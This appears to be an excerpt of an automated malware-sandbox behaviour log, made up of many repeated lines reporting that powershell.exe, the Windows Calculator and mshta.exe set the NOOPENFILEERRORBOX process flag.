                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
